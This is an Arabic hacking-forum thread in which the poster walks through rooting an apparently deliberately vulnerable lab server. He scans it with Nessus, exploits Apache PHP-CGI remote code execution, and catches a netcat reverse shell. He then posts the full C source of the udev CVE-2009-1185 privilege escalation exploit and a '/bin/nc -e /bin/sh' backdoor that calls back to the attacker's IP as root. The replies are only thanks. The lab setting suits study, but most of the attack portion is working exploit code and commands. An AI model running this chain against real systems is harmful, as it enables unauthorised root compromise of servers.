• أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد

    • يستخدم هذا الموقع ملفات تعريف الارتباط للمساعدة في تخصيص المحتوى وتخصيص تجربتك والحفاظ على تسجيل دخولك إذا قمت بالتسجيل
      . من خلال الاستمرار في استخدام هذا الموقع ، فأنت توافق على استخدامنا لملفات تعريف الارتباط.


  • بادئ الموضوع 0ne-Tw0
  • تاريخ البدء
غير متصل

Developer
إنضم
14 يناير 2013
المشاركات
34
الإعجابات
1
النقاط
30
الإجابات المقدمة: 0
#1


السلام عليكم ورحمة الله وبركاته

اللهم لا علم لنا الا ماعلمتنا , اللهم علمنا ماينفعنا وانفعنا بما علمتنا انك انت العليم الحكيم.

بسم الله الرحمن الرحيم

اليوم درسنا راح يتكلم طريقة الحصول على الروت واليوم بستخدم اداة جديدة وهي nessus

الاداة فعلا قوية

نشغلها ونعمل سكان على الضحية

ونشوف النتايج




نشوف اول ثغرة وهي

Apache PHP-CGI Remote Code Execution

يعني نقدر نستخدمها للاتصال بالموقع نفتح BurbSuite ونرسل الطلب ونشوف وش النتيجة



الثغرة شغالة والامر اللي ارسلناه شغال نحاول الان نتصل اتصال عكسي

نشغل النت كات بالامر

PHP:
nc -lvp 9898

ونرسل الطلب ويصير زي كذا


الان الحمدلله تم الاتصال



طبعا بعد البحث في السيرفر اكتشفت فيه الثغرة هذي

PHP:
/*
 * cve-2009-1185.c
 *
 * udev < 141 Local Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
 *
 *   udev before 1.4.1 does not verify whether a NETLINK message originates 
 *   from kernel space, which allows local users to gain privileges by sending 
 *   a NETLINK message from user space.
 *
 * Notes:
 *   
 *   An alternate version of kcope's exploit.  This exploit leverages the 
 *   95-udev-late.rules functionality that is meant to run arbitrary commands 
 *   when a device is removed.  A bit cleaner and reliable as long as your 
 *   distro ships that rule file.
 *
 *   Tested on Gentoo, Intrepid, and Jaunty.
 *
 * Usage:
 *
 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, 
 *   usually is the udevd PID minus 1) as argv[1].
 *
 *   The exploit will execute /tmp/run as root so throw whatever payload you 
 *   want in there.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

int
main(int argc, char **argv)
{
    int sock;
    char *mp, *err;
    char message[4096];
    struct stat st;
    struct msghdr msg;
    struct iovec iovector;
    struct sockaddr_nl address;

    if (argc < 2) {
        err = "Pass the udevd netlink PID as an argument";
        printf("[-] Error: %s\n", err);
        exit(1);
    }

    if ((stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) &&
        (stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) {
        err = "Required 95-udev-late.rules not found";
        printf("[-] Error: %s\n", err);
        exit(1);
    }

    if (stat("/tmp/run", &st) == -1) {
        err = "/tmp/run does not exist, please create it";
        printf("[-] Error: %s\n", err);
        exit(1);
    }
    system("chmod +x /tmp/run");

    memset(&address, 0, sizeof(address));
    address.nl_family = AF_NETLINK;
    address.nl_pid = atoi(argv[1]);
    address.nl_groups = 0;

    msg.msg_name = (void*)&address;
    msg.msg_namelen = sizeof(address);
    msg.msg_iov = &iovector;
    msg.msg_iovlen = 1;

    sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
    bind(sock, (struct sockaddr *) &address, sizeof(address));

    mp = message;
    mp += sprintf(mp, "remove@/d") + 1;
    mp += sprintf(mp, "SUBSYSTEM=block") + 1;
    mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
    mp += sprintf(mp, "TIMEOUT=10") + 1;
    mp += sprintf(mp, "ACTION=remove") +1;
    mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;

    iovector.iov_base = (void*)message;
    iovector.iov_len = (int)(mp-message);

    sendmsg(sock, &msg, 0);

    close(sock);

    return 0;
}

// milw0rm.com [2009-04-30]
الثغرة ترفع الصلاحيات للملف اللي بتنفذه

اول شي نكون لنا باكدور عشان لما ننفذه بصلاحيات الروت يعطينا اتصال وصلاحيات الروت

نشوف

لاحظوا مسار الملف وين

PHP:
/tmp/run
يعني الملف لازم يكون هناك عشان يتطبق

عشان نسوي باكدور

نكتب الامر هذا في مجلد

PHP:
tmp
PHP:
echo "#!/bin/sh\n/bin/nc -e /bin/sh 172.16.217.1 6789" > /tmp/run
الامر ببساطة كود باش او شل للاتصال العكسي يعني لو تنفذ الامر بصلاحيات الروت راح يعطينا اتصال عكسي بصلاحيات الروت

بس الثغرة لو نرجع لها نشوف وش متكوب فيها

PHP:
udev < 141 Local Privilege Escalation Exploit
طيب نبحث وين العملية هذي

بالامر

PHP:
ps auxf | grep udev


الان كل اللي علينا

نشغل الاستغلال زائد رقم العملية ناقص واحد .. لخبطة :ُok:ٌ

نشوف المثال

طبعا لازم نسوي لها كومبايل بالامر

PHP:
gcc -o filename filename.c


يعني بالاساس رقم العملية 2929 حنا نطرح منه واحد

في الوقت هذا لازم النت كات يكون شغال متنصت على البورت اللي كتبناه في الملف run

نشوف النتيجة



الحمدلله تم ترويت السيرفر

السيرفر عبارة عن توزيعة متعمدين الخطا فيها

وغير هذه الثغرة فيها ثغرات كثير بطرحها لكم لنتعلم جميعا

[INFO]
الروابط تضهر للاعضاء فقط سجل دخولك أو قم بالتسجيل الآن.
[/INFO]
حمل التوزيعة ونصبها على vmware وابدا اختبار لها

هذا وصلى الله على سيدنا محمد وعلى آله وصحبه اجمعين

لاتنسوني من صالح الدعاء

واسف على الاطالة
 


غير متصل

Developer
إنضم
22 فبراير 2013
المشاركات
43
الإعجابات
0
النقاط
30
الإقامة
مصرنا الحبيب
الإجابات المقدمة: 0
#2
رد: الحصول على الروت بآستخدأم آداة nessus

يعطيك العافيه ’ {:{7}: واصل :{7}:}
 


غير متصل

Active DeveloPer
إنضم
12 مارس 2012
المشاركات
81
الإعجابات
1
النقاط
30
العمر
25
الإقامة
الاردن
الإجابات المقدمة: 0
#3
رد: الحصول على الروت بآستخدأم آداة nessus

وعليكم السلام ورحمهه الله وبركاته
يعطيك العافيه​
 


غير متصل

DeveloPer Plus
إنضم
16 يوليو 2013
المشاركات
125
الإعجابات
6
النقاط
50
الإجابات المقدمة: 0
#4
رد: الحصول على الروت بآستخدأم آداة nessus

تسلم ايدك يالغالي على شرح رائع و طرح مميز
 


غير متصل

Developer
إنضم
30 نوفمبر 2012
المشاركات
61
الإعجابات
0
النقاط
30
الإقامة
ÍŕÁΘ
الإجابات المقدمة: 0
#5
رد: الحصول على الروت بآستخدأم آداة nessus

يعطيك العافية يا مبدع


واصل يا بطل
 


غير متصل

Developer
إنضم
27 ديسمبر 2011
المشاركات
54
الإعجابات
0
النقاط
30
الإقامة
|K|S|A|
الإجابات المقدمة: 0
#6
رد: الحصول على الروت بآستخدأم آداة nessus

مشكور ي بطُل وآصل ابداعاتك :{1}:
 


غير متصل

V • I • P
إنضم
10 مايو 2014
المشاركات
303
الإعجابات
6
النقاط
50
الإجابات المقدمة: 1
#7
رد: الحصول على الروت بآستخدأم آداة nessus

يعطيك 1000 عافية حبيبي :{10}::{10}:
 


غير متصل

ExpErt DeveloPer
إنضم
16 أبريل 2014
المشاركات
404
الإعجابات
13
النقاط
50
الإقامة
★ الكردستان ★
الإجابات المقدمة: 0
#8
رد: الحصول على الروت بآستخدأم آداة nessus

يعطيك عافية حبيبي
 


الوسوم - Tag الوسوم - Tag
الحصول على الروت بآستخدأم آداة nessus